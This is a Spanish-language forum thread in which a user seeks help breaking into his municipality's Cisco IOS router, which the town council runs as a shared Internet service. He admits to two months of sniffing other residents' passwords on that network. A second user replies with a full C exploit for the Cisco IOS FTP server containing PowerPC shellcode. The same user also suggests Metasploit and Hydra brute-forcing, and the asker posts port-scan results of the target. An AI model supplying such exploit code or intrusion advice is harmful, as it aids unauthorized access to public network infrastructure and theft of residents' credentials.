Hackear un router Cisco IOS 12 X ...Porfavor ayuda...

Iniciado por |Fenix|, 4 Febrero 2009, 11:26 AM

0 Miembros y 1 Visitante están viendo este tema.

|Fenix|

Hola a todos.
Es mi primer post a ver como sale.
Yo vivo en una población en la que el ayuntamiento tiene Internet
para todos los que quieran abonarse, me gustaría acceder a su router
que es un Cisco IOS 12 x e leído en varios foros que tiene bugs pero
todos para acceder vía Web, mi problema este router tiene el puerto Web
cerrado, solo es accesible vía TELNET.
Soy miembro de la red y coloque un sniffer, saco montones de contraseñas
de toda la red pero nunca acceden al router, que puedo hacer? Como saco la contraseña TELNET?
No tiene puesta las claves por defecto y llevo mas de dos meses con el sniffer sin resultado, el user no me lo pide tan solo el pass
Gracias de antemano por vuestra ayuda.

[Generator]
Generator=SWFText
[Movie]
Width=400
Height=200
Speed=12
ShowBorder=0
ShowMenu=0
AddPreload=0
ProtectImport=1
CompressMovie=1
[Background]
Mode=2
Color=0
StartColor=16777215
EndColor=0
Type=0
Rotation=0
Image=C:\Users\Fenix\Fenix.jpg
Position=0
Quality=80
[BackEffect]
UseEffect=1
Effect=Cloud
Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou

Jarmen Kell

prueba con algún exploit de metasploit, en backtrack hay mogollon de programas para cisco
R00T@LinuX# ps -e | grep bill
5446 ?        00:00:00 bill-gates
R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!

|Fenix|

Podrias decirme alguno en especial? Esque no me entiendo demasiado bien con el tema hack.
Porfavor dime alguno en particular que sirviera para el Cisco IOS 12 X.
Gracias por anticipado
[Generator]
Generator=SWFText
[Movie]
Width=400
Height=200
Speed=12
ShowBorder=0
ShowMenu=0
AddPreload=0
ProtectImport=1
CompressMovie=1
[Background]
Mode=2
Color=0
StartColor=16777215
EndColor=0
Type=0
Rotation=0
Image=C:\Users\Fenix\Fenix.jpg
Position=0
Quality=80
[BackEffect]
UseEffect=1
Effect=Cloud
Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou

Jarmen Kell

/*

Cisco IOS FTP server remote exploit by Andy Davis 2008               
                                                                     
Cisco Advisory ID: cisco-sa-20070509-iosftp - May 2007               
                                                                     
Specific hard-coded addresses for IOS 12.3(18) on a 2621XM router   
                                                                     
Removes the requirement to authenticate and escalates to level 15   
                                                                     
*********************************************************************
To protect the innocent a critical step has been omitted, which means
the shellcode will only execute when the router is attached to gdb. 
I'm sure the PowerPC shellcoders out there will work it out...       
*********************************************************************
                                                                     
Thanks to Gyan Chawdhary and Varun Uppal for all the hours they spent
on the original IOS security research                               
                                                                     
iosftpexploit <at> googlemail 'dot' com                             

*/

#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>

#define PORT 21

int main(int argc, char **argv)
{
unsigned char sendbuf[] =

"MKD "

/* .equ vty_info, 0x8182da60    # pointer to VTY info */
/* .equ terminate, 0x80e4086c   # kill a process */

"\x3c\x80\x81\x83"      /* lis     4,vty_info@ha */
"\x38\x84\xda\x60"      /* la      4,vty_info@l(4) */
"\x7d\x08\x42\x78"      /* xor     8,8,8 */
"\x7c\xe4\x40\x2e"      /* lwzx    7,4,8 */
"\x91\x07\x01\x74"      /* stw     8,372(7) */
"\x39\x08\xff\xff"      /* subi    8,8,1 */
"\x38\xe7\x09\x1a"      /* addi    7,7,233 */
"\x91\x07\x04\xca"      /* stw     8,1226(7) */
"\x7d\x03\x43\x78"      /* mr      3,8 */
"\x3c\x80\x80\xe4"      /* lis     4,terminate@ha */
"\x38\x84\x08\x6c"      /* la      4,terminate@l(4) */
"\x7c\x89\x03\xa6"      /* mtctr   4 */
"\x4e\x80\x04\x20"      /* bctr    */

/* exists cleanly without adversely affecting the FTP server */

"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */
"\x61\x61\x61\x61"      /* padding */

"\x80\x06\x23\xB8"      /* return address */
"\x0d\x0a";

/* trampoline code */
/* when the overflow occurs r26+0x14 points to the shellcode */
/*
0x800623B8      lwz     26, 20(26)
0x800623BC      mtctr   26
0x800623C0      mr      3, 27
0x800623C4      bctrl
*/

unsigned char recvbuf[256];
struct sockaddr_in servaddr;
int s;

if (argc != 2)
        {
        printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");

        printf ("\nUsage: %s <target IP address>\n",argv[0]);
        exit(-1);
        }

servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = inet_addr(argv[1]);
servaddr.sin_port = htons(PORT);

s = socket(AF_INET, SOCK_STREAM, 0);
connect (s, (struct sockaddr *) &servaddr, sizeof(servaddr));
printf ("\nCisco IOS FTP server remote exploit by Andy Davis 2008\n");
printf ("Specific offsets for IOS 12.3(18) on a 2621XM router\n\n");
printf ("Sending exploit...\n\n");

if (send(s, sendbuf, sizeof(sendbuf)-1, 0) == 0)
        {
        printf("Error sending packet...quitting\n\n");
        exit (1);
        }
recv (s, recvbuf, sizeof(recvbuf)-1,0);
printf ("Now telnet to the router for a shell...\n\n");
}

// milw0rm.com [2008-07-29]
R00T@LinuX# ps -e | grep bill
5446 ?        00:00:00 bill-gates
R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!

|Fenix|

#4
Muchas gracias, pero podrias indicarme como se usa ese codigo??que tengo que hacer exactamente con el??
Ademas el codigo parece que es para FTP y lo necesito para TELNET.
Espero que perdones lo inesperto que soy en este tema, pero te agradezco muchisimo tu esfuerzo.
Responde cuanto antes porfavor, gracias por anticipado
[Generator]
Generator=SWFText
[Movie]
Width=400
Height=200
Speed=12
ShowBorder=0
ShowMenu=0
AddPreload=0
ProtectImport=1
CompressMovie=1
[Background]
Mode=2
Color=0
StartColor=16777215
EndColor=0
Type=0
Rotation=0
Image=C:\Users\Fenix\Fenix.jpg
Position=0
Quality=80
[BackEffect]
UseEffect=1
Effect=Cloud
Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou

Jarmen Kell

R00T@LinuX# ps -e | grep bill
5446 ?        00:00:00 bill-gates
R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!

|Fenix|

No, no lo tiene abierto estoy totalmente seguro.
Saves la manera de colarme o el codigo para telnet???
Gracias por anticipado amigo.
[Generator]
Generator=SWFText
[Movie]
Width=400
Height=200
Speed=12
ShowBorder=0
ShowMenu=0
AddPreload=0
ProtectImport=1
CompressMovie=1
[Background]
Mode=2
Color=0
StartColor=16777215
EndColor=0
Type=0
Rotation=0
Image=C:\Users\Fenix\Fenix.jpg
Position=0
Quality=80
[BackEffect]
UseEffect=1
Effect=Cloud
Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou

Jarmen Kell

no se me ocurre nada, lo mismo puedes sacar la pass de telnet con hydra.... no lo he probado
R00T@LinuX# ps -e | grep bill
5446 ?        00:00:00 bill-gates
R00T@LinuX# kill -9 5446 INMEDIATAMENTE!!!

|Fenix|

Ok de todas formas gracias por tu ayuda.
Y no hay nadie masss por aqui??? que pueda echarme una mano??????
Porfavor contesten es importanteeeee graciassss!!!!!
[Generator]
Generator=SWFText
[Movie]
Width=400
Height=200
Speed=12
ShowBorder=0
ShowMenu=0
AddPreload=0
ProtectImport=1
CompressMovie=1
[Background]
Mode=2
Color=0
StartColor=16777215
EndColor=0
Type=0
Rotation=0
Image=C:\Users\Fenix\Fenix.jpg
Position=0
Quality=80
[BackEffect]
UseEffect=1
Effect=Cloud
Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou

|Fenix|

Despues de un escaneo con Zenmap a la ip tiene abierto los siguientes puertos:
7/tcp    open     echo
9/tcp    open     discard?
13/tcp   open     daytime      Cisco router daytime
19/tcp   open     chargen
23/tcp   open     telnet       Cisco router
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
445/tcp  filtered microsoft-ds
2001/tcp open     telnet       Cisco router
6001/tcp open     tcpwrapped
hay alguna otra manera de acceder al router???? gracias amigos por anticipado
[Generator]
Generator=SWFText
[Movie]
Width=400
Height=200
Speed=12
ShowBorder=0
ShowMenu=0
AddPreload=0
ProtectImport=1
CompressMovie=1
[Background]
Mode=2
Color=0
StartColor=16777215
EndColor=0
Type=0
Rotation=0
Image=C:\Users\Fenix\Fenix.jpg
Position=0
Quality=80
[BackEffect]
UseEffect=1
Effect=Cloud
Property=<><Background.CloudNumber>20</Background.CloudNumber><Backgrou